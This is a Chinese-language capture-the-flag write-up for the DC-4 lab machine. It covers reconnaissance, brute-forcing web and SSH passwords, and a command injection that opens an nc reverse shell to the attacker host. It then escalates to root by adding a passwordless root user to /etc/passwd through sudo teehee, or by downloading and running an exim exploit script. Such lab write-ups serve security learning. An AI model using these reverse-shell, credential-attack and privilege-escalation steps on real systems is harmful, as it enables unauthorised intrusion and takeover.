DC-4 writeup

DC-4渗透过程（kali IP:192.168.229.132 靶机IP:192.168.229.151）

**一.信息收集**
nmap -sP 192.168.229.0/24
nmap -sV -p- 192.168.229.151
whatweb 192.168.229.151
dirsearch -u 192.168.229.151 -e * -x 403,404
发现可用的信息很少，几乎没有，尝试直接爆破

**二.暴力破解**
这里就猜用户名为admin 字典用弱口令top1000 用burpsuite爆破出来密码是happy，登录进去看发现可用执行命令，抓个包来看看可以执行其他命令吗，发现可以执行一些查看类的命令

**三.反弹shell**
通过尝试发现不能用echo写入木马，bash也反弹不了，nc能用，这尝试用nc反弹shell
在kali上：
nc -vlp 8888
用burp抓包,radio=nc -e /bin/bash 192.168.229.132 8888
kali上连接到一个虚拟shell
python -c 'import pty;pty.spawn("/bin/bash")'
find / -perm -u=s -type f 2>/dev/null    //查看哪些有suid权限发现没有可用的
sudo -l    //没有权限
cat /etc/passwd    //sudo,suid,msf,searchsploit都没有发现可以利用的，则尝试从用户入手
cd /home    //去家目录下寻找线索发现只有jim能查看里面的信息，mbox还看不了，里面有一个旧密码的备份文件，复制到test文件尝试爆破
hydra -l jim -P test 192.168.229.151 ssh    //爆破出来密码jibril04

**四.提权**
ssh jim@192.168.229.151
cat mbox    //查看刚才看不了的文件提示我们要去看邮件
cd /var/spool/mail
ls
cat jim    //发现里面有charles的密码，^xHhA&hvim0y
ssh charles@192.168.229.151
sudo -l    //查看哪些能以root身份执行，发现teehee,利用它提权
echo "test::0:0:::/bin/bash" | sudo teehee -a /etc/passwd
su test    //获得root权限
cd /root
ls
cat flag.txt

这里还有另一种解法，利用exim的提取漏洞
因为在检测SUID文件的时候看到了有exim（前提是知道exim有提权漏洞）
exim --version    //4.89
searchsploit exim    //重新开一个终端搜索漏洞,发现有提权漏洞
locate  linux/local/46996.sh    
cp /usr/share/exploitdb/exploits/linux/local/46996.sh test.sh
python3 -m http.server    //开启的是8000端口
回到虚拟shell
wget http://192.168.229.132:/8000/test.sh    //发现没有写入权限，则cd到 /tmp 文件中，在/tmp目录下任何人都有写权限
cd /tmp
wget http://192.168.229.132:/8000/test.sh
chmod 777 test.sh    //给test.sh文件赋权
./test.sh    //得到root权限